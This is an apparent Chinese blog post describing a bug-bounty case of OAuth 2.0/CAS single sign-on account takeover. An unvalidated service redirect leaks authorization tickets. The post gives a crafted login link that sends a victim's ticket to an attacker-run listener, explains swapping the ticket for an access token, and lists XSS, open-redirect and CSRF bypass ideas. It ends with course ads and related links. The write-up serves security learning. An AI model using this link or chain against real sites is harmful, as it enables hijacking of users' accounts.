OAuth2.0劫持账号漏洞挖掘案例

最新推荐文章于 2025-09-25 00:21:49 发布
原创 最新推荐文章于 2025-09-25 00:21:49 发布 · 783 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据仓库 #前端 #web安全

OAuth2.0劫持账号漏洞挖掘案例

前言

SSO和OAuth2.0大家都不陌生了,SSO简单说是一种概念,将登录认证和业务系统分离,而OAuth则是常用的授权框架,像微信、qq第三方登录,很多文章也都写了,这里就不叙述了,下面的案例则是用OAuth2.0来实现SSO单点登录的场景

漏洞挖掘过程

登录受害者账号,下面有很多子系统,随便点击一个,抓包看看流程

image.png

关键的有几个数据包,第一个数据包重定向的页面中携带了ticket

img

浏览器访问是这样的

img

第二个数据包如下,请求授权服务来获取access_token,这就是典型OAuth中的的授权码模式,上面的ticket就是授权码code

img

第三个数据包如下,带着这个token直接访问目标系统

img

我们将第一个get请求包参数修改为baidu测试看看是否做了限制,发现会直接跳到百度,没有做任何限制,这就代表攻击者访问自己的服务器就会把这个ticket带出,我们劫持到这个就可以劫持受害者账号

img

本地启动一个http服务演示,实际可使用dnslog或者自己服务器

image.png

将此链接发送给受害者,受害者点击即可盗取受害者的ticket

https://xx.xx.com/cas-server/login?service=http%3A%2F%2F127.0.0.1:8000

img

接受到ticket

img

直接把第二个数据包中的code替换,获取生成的access_token

img

直接将第三个数据包中的token替换访问即可接管账号

img

其它一些常见测试思路

假如说请求的url做了白名单限制,我们就可以尝试配合子域名下的xss来定向到我们的服务器,同理利用url跳转也可以绕过

还可以利用csrf劫持账号,在OAuth2.0协议中是有state参数,是随机生成的一串字符串来进行防御,但是也有很多站点没有使用这个参数或者参数值不会改变就会导致csrf

还有就是像令牌复用、不过期等风险项,实际利用很难的话国内src基本上也不会收

总的来说就是要关注整个认证流程每一个数据包,分析每一步是干了什么,如果有携带了代表账号的id、username、手机号等相关信息就可以尝试进行修改,有些参数可能进行了编码就忽略掉了

题外话

黑客&网络安全如何学习*

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我们和网安大厂360共同研发的的网安视频教程,内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识,而且包含了中级的各种渗透技术,并且还有后期的CTF对抗、区块链安全等高阶技术。总共200多节视频,100多本网安电子书,最新学习路线图和工具安装包都有,不用担心学不全。
在这里插入图片描述

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

第三方登录、任意用户登录、暴露账号隐私风险等漏洞总结
墨痕诉清风的博客
07-12 804
以两步登录为例,登录输入账号密码/手机号验证码/其他的凭证信息后第一个请求校验其正确性后,第二个请求根据后端返回的账号/手机号/用户id等字段去获取用户凭证的登录逻辑。系统使用jwt作为认证字段,且其中关键用户信息字段可以遍历时,若未验参或者使用弱密钥时,便可以将用户信息字段进行更改,删除/爆破弱密钥重新生成签名,到达任意用户登录。​ 一般正常的登录流程为服务端校验完用户身份后,返回用户凭证,但某些系统由于登录前会有很多的查询用户信息类的功能请求,经常导致在登录验证前就返回了用户凭证。
企业级 Agent 协作系统安全机制与权限控制实战:认证、授权与行为审计体系构建
努力分享一些人工智能、计算机视觉、影像等相关的知识干货!
05-04 1591
在企业级多智能体协作系统中,多个 Agent 组件在复杂任务流中协同运行,涉及多租户环境下的任务分发、策略执行与资源共享,系统安全问题不容忽视。如何构建完善的身份认证机制、精细化的权限控制体系与可追踪的行为审计链,成为保障 Agent 系统运行合规性、控制边界风险与实现权限最小化原则的关键。本文围绕“认证机制、权限控制模型、行为审计系统、安全联动策略”四大核心模块,系统梳理企业级 Agent 协作系统的安全落地路径,并结合生产实践场景提供可直接部署的架构与策略方案。
利用OAuth劫持用户身份
08-27
文档介绍了OAuth的发展过程和OAuth的四种调用方式,并对OAuth的风险进行了分析以及如何利用OAuth漏洞
「 典型安全漏洞系列 」12.OAuth 2.0身份验证漏洞攻击思路
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
04-06 3235
OAuth是一种常用的授权框架,使网站和web应用程序能够请求对另一个应用程序上的用户帐户的有限访问。OAuth允许用户在不向请求的应用程序公开其登录凭据的情况下授予此访问权限。这意味着用户可以调整他们想要共享的数据,而不必将其帐户的完全控制权交给第三方。集成需要从用户帐户访问某些数据的第三方功能(设计之初的场景)。例如,应用程序可能会使用OAuth请求访问您的电子邮件联系人列表,以便建议与之联系的人员。提供第三方身份验证服务(广泛使用的场景),允许用户使用他们在不同网站上的帐户登录。
OAuth简介
最新发布
rasssel的博客
09-25 1204
防护措施说明state 参数防止 CSRF 攻击,确保请求来自用户本人HTTPS防止授权码、token 被抓包窃取短期授权码和 access_token减少被滥用风险绑定 redirect_uri / client_id防止授权码被恶意使用安全存储 token避免泄露给第三方刷新 token 绑定与轮换避免长期滥用。
PortSwigger——OAuth 2.0 authentication vulnerabilities
qq_55202378的博客
03-14 1543
OAuth是一种常用的授权框架,微信登录抖音就是典型的OAuth授权。这里所说的OAuth指的是OAuth 2.0OAuth授权涉及三个不同方:客户端应用程序、资源所有者和OAuth服务提供者。客户端应用程序:抖音;资源所有者:用户(你);OAuth 服务提供者:微信。单点登录(Single Sign-On,简称 SSO)是一种身份验证机制,允许用户通过一次登录访问多个相关但独立的系统或应用,而无需在每个系统中重复登录。OAuth 2.0
HTTP leak Oauth劫持
weixin_42278930的博客
12-08 274
HTTP leak Oauth劫持 1.找到某测试网站,可以使用微信扫码进行登录。 2.正常登录,在F12下查看network可以看到浏览器向这个地址发起了一次请求并携带了code和state信息,先把这个地址保存下来。 3.打开无痕模式后重新点击微信登录后redirect_uri 参数为登录后跳转地址,一般会做验证所以跳转外站是行不通的,但跳转站内地址一般则不受限制。 4.找到一个可以传入外部链接的地方,最好是可以找到可以上传外部图片的地方,更改redirect_uri参数后让用户跳转到我们上传图片的
【隐式授权模式】:Facebook OAuth2.0的利与弊分析
本文首先概述了OAuth2.0隐式授权模式的基本概念,探讨了其理论基础,包括核心概念和工作原理,并将其与授权码模式进行了对比分析。在此基础上,本文进一步探讨了隐式授权模式在实践中的优势,如快速登录和用户体验...
2024最新应急响应SRC实战资料合集(附下载地址)
goodxianping的专栏
01-09 787
漏洞挖掘之某厂商OAuth2.0认证缺陷CSRF-第三方帐号快捷登录授权劫持漏洞.pdf。补天-漏洞_安全 系统漏洞_IoT APP漏洞_移动 工控漏洞.pdf。漏洞挖掘之众测厂商 第三方登录RedirectUrl劫持漏洞.pdf。记一次实战攻防(打点-Edr-内网-横向-Vcenter).pdf。漏洞挖掘之众测厂商 redirect_uri 授权劫持漏洞.pdf。实战---记一次攻防Exchange艰难getshell.pdf。记一次红队攻防中.Net代码审计与防守方的对抗过程.docx。
Web渗透测试-实战 方法 思路 总结
热门推荐
m0_55595611的博客
02-21 1万+
尽可能的搜集目标的信息 端口信息 DNS信息 员工邮箱 信息搜集的分类 1、主动式信息搜集(可获取到的信息较多,但易被目标发现) 2、通过直接发起与被测目标网络之间的互动来获取相关信息,如通过Nmap扫描目标系统。 3、被动式信息搜集(搜集到的信息较少,但不易被发现) 4、通过第三方服务来获取目标网络相关信息。如通过搜索引擎方式来搜集信息。 搜索引擎 Google hacking 常用搜索语法: intitle:KEYWORD //搜索网页标题中含有关键词的网页 intext:KEYWORD //搜索站
绕过抖音OAuth2.0的302劫持:自建代理服务实现SSO登录
2501_91872187的博客
06-01 874
​:在代理服务中保持原始参数顺序,避免签名失效。
我找到一个价值5.5万美元的 Facebook OAuth账户劫持漏洞
smellycat000的专栏
03-13 3741
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队研究员 Amol Baikar从 Facebook OAuth 中发现了一个漏洞并获得5.5...
漏洞挖掘】——142、 逻辑漏洞OAuth 2.0认证缺陷刨析
Fly_鹏程万里
07-29 777
我们在浏览到一个网页时经常会遇到需要使用一段第三方社交媒体的账户(Github、Facebook等)登录的情况,而这种大多数都是使用OAuth 2.0框架构建的,关于此项技术之前只是在一些功能站点中作为用户来使用并未对此进行深入研究,最近出于对OAuth 2.0安全评估需求,对OAuth 2.0的身份认证过程和安全脆弱性进行了一个从零到一的梳理并以文章方式呈现,本篇文章将着重介绍OAuth身份认证的原理、OAuth 身份认证过程中存在的安全问题以及如何正确使用OAuth进行身份认证。
Oauth劫持-持续更新】
asmartrman的博客
08-22 352
尝试修改email和username,成功登陆,用户和token并没有进行绑定。登陆过程抓包,发现用户凭证token作为参数传递。
攻击数亿个账户,黑客利用OAuth2.0疯狂作恶
bdfcfff77fa的博客
08-01 746
OAuth是一种标准授权协议,它允许用户在不需要向第三方网站或应用提供密码的情况下向第三方网站或应用授予对存储于其他网站或应用上的信息的。
漏洞挖掘之某厂商OAuth2.0认证缺陷
2401_84434570的博客
05-03 1842
文章中的项目地址统一修改为: a.test.com 保护厂商也保护自己。
OAuth 2.0攻击方法及案例总结
zhangge3663的博客
11-05 1539
OAuth流程 本文以两种广泛使用的方案为标准展开。 如对流程不了解,请先移步学习:理解OAuth 2.0 Authorization Code response_type = code redirect_uri scope client_id state Implicit response_type = token redirect_uri...
分享OAuth2.0原理及漏洞挖掘技巧案例分析
lza20001103的博客
05-29 939
分享OAuth2.0原理及漏洞挖掘技巧案例分析
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值